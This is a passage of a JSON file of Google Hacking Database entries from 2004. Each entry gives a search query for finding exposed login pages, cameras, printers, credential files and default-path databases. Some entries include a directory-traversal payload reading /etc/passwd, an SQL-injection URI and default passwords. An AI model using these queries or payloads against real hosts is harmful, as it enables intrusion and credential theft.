CGI parameter in an HTTP GET request. 
This issue is known to affect SoftCart version 4.00b.", "submited": "2004-11-07", "request": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "id": 672}, {"short description": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "long description": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631", "submited": "2004-11-12", "request": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "id": 673}, {"short description": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "long description": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator' is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator.", "submited": "2004-11-09", "request": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "id": 674}, {"short description": "\"driven by: ASP Message Board\"", "long description": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out.", "submited": "2004-11-12", "request": "\"driven by: ASP Message Board\"", "id": 675}, {"short description": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugallery.com -site:duware.com", "long description": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. 
Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html", "submited": "2004-11-16", "request": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugall", "id": 676}, {"short description": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "long description": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb", "submited": "2004-11-16", "request": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "id": 677}, {"short description": "intext:\"enable secret 5 $\"", "long description": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string.", "submited": "2004-11-16", "request": "intext:\"enable secret 5 $\"", "id": 678}, {"short description": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "long description": "Postfix Admin login pages. Duh.", "submited": "2004-11-16", "request": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "id": 679}, {"short description": "ext:cgi inurl:editcgi.cgi inurl:file=", "long description": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php", "submited": "2004-11-16", "request": "ext:cgi inurl:editcgi.cgi inurl:file=", "id": 680}, {"short description": "inurl:axis-cgi", "long description": "Just another search string to detect the infamous Axis netcams. 
This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)", "submited": "2004-11-16", "request": "inurl:axis-cgi", "id": 681}, {"short description": "filetype:ns1 ns1", "long description": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\".", "submited": "2004-11-16", "request": "filetype:ns1 ns1", "id": 682}, {"short description": "\"Starting SiteZAP 6.0\"", "long description": "siteZap webcams !", "submited": "2004-11-16", "request": "\"Starting SiteZAP 6.0\"", "id": 683}, {"short description": "intitle:\"phpPgAdmin - Login\" Language", "long description": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services", "submited": "2005-03-03", "request": "intitle:\"phpPgAdmin - Login\" Language", "id": 684}, {"short description": "filetype:config web.config -CVS", "long description": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error.", "submited": "2004-11-16", "request": "filetype:config web.config -CVS", "id": 685}, {"short description": "filetype:myd myd -CVS", "long description": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.", "submited": "2004-11-18", "request": "filetype:myd myd -CVS", "id": 686}, {"short description": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "long description": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. 
These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654", "submited": "2004-11-18", "request": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "id": 687}, {"short description": "intext:(\"UBB.threads 6.2\"|\"UBB.threads 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "long description": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php", "submited": "2004-11-18", "request": "intext:(\"UBB.threads 6.2\"|\"UBB.threads 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "id": 688}, {"short description": "inurl:/SiteChassisManager/", "long description": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/", "submited": "2004-11-18", "request": "inurl:/SiteChassisManager/", "id": 689}, {"short description": "\"Powered by Land Down Under 601\"", "long description": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. 
An exploit exists on the internet, search google.", "submited": "2004-11-18", "request": "\"Powered by Land Down Under 601\"", "id": 690}, {"short description": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "long description": "Evocams !", "submited": "2004-11-18", "request": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "id": 691}, {"short description": "inurl:directorypro.cgi", "long description": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793", "submited": "2004-11-18", "request": "inurl:directorypro.cgi", "id": 692}, {"short description": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "long description": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory.", "submited": "2004-11-18", "request": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "id": 693}, {"short description": "inurl:cal_make.pl", "long description": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663", "submited": "2004-11-18", "request": "inurl:cal_make.pl", "id": 694}, {"short description": "inurl:/webedit.* intext:WebEdit Professional -html", "long description": "WebEdit is a content management system. 
This is the login portal search.", "submited": "2004-11-18", "request": "inurl:/webedit.* intext:WebEdit Professional -html", "id": 695}, {"short description": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "long description": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm", "submited": "2004-11-21", "request": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "id": 696}, {"short description": "\"Powered by PowerPortal v1.3\"", "long description": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681", "submited": "2004-11-18", "request": "\"Powered by PowerPortal v1.3\"", "id": 697}, {"short description": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "long description": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. 
However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well.", "submited": "2004-11-23", "request": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "id": 698}, {"short description": "inurl:report \"EVEREST Home Edition \"", "long description": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find.", "submited": "2004-11-20", "request": "inurl:report \"EVEREST Home Edition \"", "id": 699}, {"short description": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "long description": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688", "submited": "2004-11-19", "request": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "id": 700}, {"short description": "\"powered by ducalendar\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. 
The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb", "submited": "2004-11-23", "request": "\"powered by ducalendar\" -site:duware.com", "id": 701}, {"short description": "\"Powered by Duclassified\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb", "submited": "2004-11-23", "request": "\"Powered by Duclassified\" -site:duware.com", "id": 702}, {"short description": "\"Powered by Dudirectory\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb", "submited": "2004-11-23", "request": "\"Powered by Dudirectory\" -site:duware.com", "id": 703}, {"short description": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb", "submited": "2004-11-23", "request": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "id": 704}, {"short description": "\"powered by duclassmate\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. 
The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb", "submited": "2004-11-23", "request": "\"powered by duclassmate\" -site:duware.com", "id": 705}, {"short description": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb", "submited": "2004-11-23", "request": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "id": 706}, {"short description": "\"powered by dudownload\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb", "submited": "2004-11-23", "request": "\"powered by dudownload\" -site:duware.com", "id": 707}, {"short description": "intitle:\"ipcop - main\"", "long description": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)", "submited": "2004-11-23", "request": "intitle:\"ipcop - main\"", "id": 708}, {"short description": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "long description": "smoothwall is a firewall operating system distribution based on Linux. 
(Not many results for this search at the moment).", "submited": "2004-11-24", "request": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "id": 709}, {"short description": "filetype:php HAXPLORER \"Server Files Browser\"", "long description": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers", "submited": "2004-11-28", "request": "filetype:php HAXPLORER \"Server Files Browser\"", "id": 710}, {"short description": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "long description": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. 
It is free for use on any site, personal or commercial!", "submited": "2004-11-28", "request": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "id": 711}, {"short description": "filetype:log intext:\"ConnectionManager2\"", "long description": "ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in....", "submited": "2004-11-28", "request": "filetype:log intext:\"ConnectionManager2\"", "id": 712}, {"short description": "intext:\"Videoconference Management System\" ext:htm", "long description": "Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook", "submited": "2004-11-28", "request": "intext:\"Videoconference Management System\" ext:htm", "id": 713}, {"short description": "ext:txt \"Final encryption key\"", "long description": "IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords.", "submited": "2004-11-28", "request": "ext:txt \"Final encryption key\"", "id": 714}, {"short description": "filetype:log \"See `ipsec --copyright\"", "long description": "BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. 
It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC.", "submited": "2004-11-28", "request": "filetype:log \"See `ipsec --copyright\"", "id": 715}, {"short description": "intitle:\"Welcome To Xitami\" -site:xitami.com", "long description": "Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)", "submited": "2004-11-28", "request": "intitle:\"Welcome To Xitami\" -site:xitami.com", "id": 716}, {"short description": "inurl:testcgi xitami", "long description": "Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server.", "submited": "2004-11-28", "request": "inurl:testcgi xitami", "id": 717}, {"short description": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq -gov -edu", "long description": "some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know.", "submited": "2004-11-28", "request": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq", "id": 718}, {"short description": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "long description": "TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. 
It's not PW protected so an attacker can browse the files and take what they want.", "submited": "2004-11-28", "request": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "id": 719}, {"short description": "inurl:\"GRC.DAT\" intext:\"password\"", "long description": "symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords.", "submited": "2004-11-28", "request": "inurl:\"GRC.DAT\" intext:\"password\"", "id": 720}, {"short description": "inurl:php.exe filetype:exe -example.com", "long description": "It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)", "submited": "2004-11-28", "request": "inurl:php.exe filetype:exe -example.com", "id": 721}, {"short description": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "long description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the login pages.", "submited": "2004-11-28", "request": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "id": 722}, {"short description": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "long description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the main and recently changed files pages.", "submited": "2004-11-28", "request": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "id": 723}, {"short description": "\"Output produced by SysWatch *\"", "long description": "sysWatch is a CGI to display current information about your UNIX system. 
It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..).", "submited": "2004-11-28", "request": "\"Output produced by SysWatch *\"", "id": 724}, {"short description": "PHPKonsole PHPShell filetype:php -echo", "long description": "PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...", "submited": "2004-11-28", "request": "PHPKonsole PHPShell filetype:php -echo", "id": 725}, {"short description": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "long description": "Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages.", "submited": "2004-11-28", "request": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "id": 726}, {"short description": "\"Warning: mysql_query()\" \"invalid query\"", "long description": "MySQL query errors revealing database schema and usernames.", "submited": "2004-11-28", "request": "\"Warning: mysql_query()\" \"invalid query\"", "id": 727}, {"short description": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "long description": "Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109", "submited": "2004-11-29", "request": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "id": 728}, {"short description": "inurl:\"ipp/pdisplay.htm\"", "long description": "Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems bringing the power of the Net to your business environment. 
This search locates various online printers.", "submited": "2004-11-30", "request": "inurl:\"ipp/pdisplay.htm\"", "id": 729}, {"short description": "filetype:mdb inurl:\"news/news\"", "long description": "Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected.", "submited": "2004-11-30", "request": "filetype:mdb inurl:\"news/news\"", "id": 730}, {"short description": "intitle:\"View Img\" inurl:viewimg.php", "long description": "It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information.", "submited": "2004-11-30", "request": "intitle:\"View Img\" inurl:viewimg.php", "id": 731}, {"short description": "intitle:\"Resin Default Home Page\"", "long description": "Resin provides a fast standalone web server. This search locates those servers based on the title of the default page.", "submited": "2004-11-30", "request": "intitle:\"Resin Default Home Page\"", "id": 732}, {"short description": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "long description": "These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. 
\"As part of the IBM TotalStorage Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.\"", "submited": "2004-11-30", "request": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "id": 733}, {"short description": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "long description": "WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins.", "submited": "2004-12-01", "request": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "id": 734}, {"short description": "site:ups.com intitle:\"Ups Package tracking\" intext:\"1Z ### ### ## #### ### #\"", "long description": "Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit", "submited": "2004-11-25", "request": "site:ups.com intitle:\"Ups Package tracking\" intext:\"1Z ### ### ## #### ### #\"", "id": 735}, {"short description": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "long description": "TWiki has many security problems, depending on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. 
Developers can create new web applications based on a Plugin API.", "submited": "2004-12-02", "request": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "id": 736}, {"short description": "+\"Powered by Invision Power Board v2.0.0..2\"", "long description": "A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719", "submited": "2004-12-01", "request": "+\"Powered by Invision Power Board v2.0.0..2\"", "id": 737}, {"short description": "ext:gho gho", "long description": "Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!", "submited": "2004-12-03", "request": "ext:gho gho", "id": 738}, {"short description": "ext:pqi pqi -database", "long description": "PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!", "submited": "2004-12-03", "request": "ext:pqi pqi -database", "id": 739}, {"short description": "ext:vmdk vmdk", "long description": "VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything.", "submited": "2004-12-03", "request": "ext:vmdk vmdk", "id": 740}, {"short description": "ext:vmx vmx", "long description": "VMWare allows PC emulation across a variety of platforms. 
These configuration files describe a virtual PC, and reveal information about that PC's hardware settings.", "submited": "2004-12-03", "request": "ext:vmx vmx", "id": 741}, {"short description": "inurl:filezilla.xml -cvs", "long description": "filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source program filezilla.", "submited": "2004-12-02", "request": "inurl:filezilla.xml -cvs", "id": 742}, {"short description": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "long description": "phpbb is vulnerable to SQL Injection, allowing people to manipulate the query into pulling data (such as passwords). Arbitrary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal.", "submited": "2004-12-01", "request": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "id": 743}, {"short description": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "long description": "Captain, the Phasers are online :)", "submited": "2004-12-03", "request": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "id": 744}, {"short description": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "long description": "Xerox DocuPrint printer models.", "submited": "2004-12-03", "request": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "id": 745}, {"short description": "inurl:\"printer/main.html\" intext:\"settings\"", "long description": "Brother HL Printers.", "submited": "2004-12-03", "request": "inurl:\"printer/main.html\" intext:\"settings\"", "id": 746}, {"short description": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "long description": "Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures e.g., servers, operating systems, network devices, network services, applications, and components. 
Some pages may be IP restricted.", "submited": "2004-12-03", "request": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "id": 747}, {"short description": "axis storpoint \"file view\" inurl:/volumes/", "long description": "The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF.", "submited": "2004-12-04", "request": "axis storpoint \"file view\" inurl:/volumes/", "id": 748}, {"short description": "inurl:\"/axs/ax-admin.pl\" -script", "long description": "This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats.", "submited": "2004-12-04", "request": "inurl:\"/axs/ax-admin.pl\" -script", "id": 749}, {"short description": "\"Generated by phpSystem\"", "long description": "PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts.", "submited": "2004-12-05", "request": "\"Generated by phpSystem\"", "id": 750}, {"short description": "php-addressbook \"This is the addressbook for *\" -warning", "long description": "php-addressbook shows user address information without a password.", "submited": "2004-12-05", "request": "php-addressbook \"This is the addressbook for *\" -warning", "id": 751}, {"short description": "intitle:\"Multimon UPS status page\"", "long description": "Multimon provide UPS monitoring services", "submited": "2004-12-04", "request": "intitle:\"Multimon UPS status page\"", "id": 752}, {"short description": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "long description": "CMailServer is a small mail webmail server. 
Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html", "submited": "2004-12-04", "request": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "id": 753}, {"short description": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "long description": "This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents.", "submited": "2004-12-05", "request": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "id": 754}, {"short description": "intitle:\"Live NetSnap Cam-Server feed\"", "long description": "Netsnap Online Cameras", "submited": "2004-12-06", "request": "intitle:\"Live NetSnap Cam-Server feed\"", "id": 755}, {"short description": "intitle:\"V-Gear BEE\"", "long description": "V-Gear Bee Web Cameras", "submited": "2004-12-06", "request": "intitle:\"V-Gear BEE\"", "id": 756}, {"short description": "intitle:\"AudioReQuest.web.server\"", "long description": "Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!", "submited": "2004-12-06", "request": "intitle:\"AudioReQuest.web.server\"", "id": 757}, {"short description": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "long description": "Dshield is a distributed intrusion detection system. 
The ipinfo.php script includes a whois lookup form.", "submited": "2004-12-07", "request": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "id": 758}, {"short description": "ext:cfg radius.cfg", "long description": "\"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods\"This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc.", "submited": "2004-12-06", "request": "ext:cfg radius.cfg", "id": 759}, {"short description": "intitle:\"VitalQIP IP Management System\"", "long description": "The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html", "submited": "2004-12-07", "request": "intitle:\"VitalQIP IP Management System\"", "id": 760}, {"short description": "intext:\"powered by Web Wiz Journal\"", "long description": "Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html", "submited": "2004-12-13", "request": "intext:\"powered by Web Wiz Journal\"", "id": 761}, {"short description": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "long description": "vHost is a one-step solution for all virtual hosting needs. 
It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks.", "submited": "2004-12-13", "request": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "id": 762}, {"short description": "intitle:\"start.managing.the.device\" remote pbx acc", "long description": "MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)", "submited": "2004-12-10", "request": "intitle:\"start.managing.the.device\" remote pbx acc", "id": 763}, {"short description": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "long description": "WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously", "submited": "2004-12-13", "request": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "id": 764}, {"short description": "inurl:\":631/printers\" -php -demo", "long description": "CUPS provides a portable printing layer for UNIX-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (\"IPP\") as the basis for managing print jobs and queues. The Line Printer Daemon (\"LPD\") Server Message Block (\"SMB\"), and AppSocket (a.k.a. 
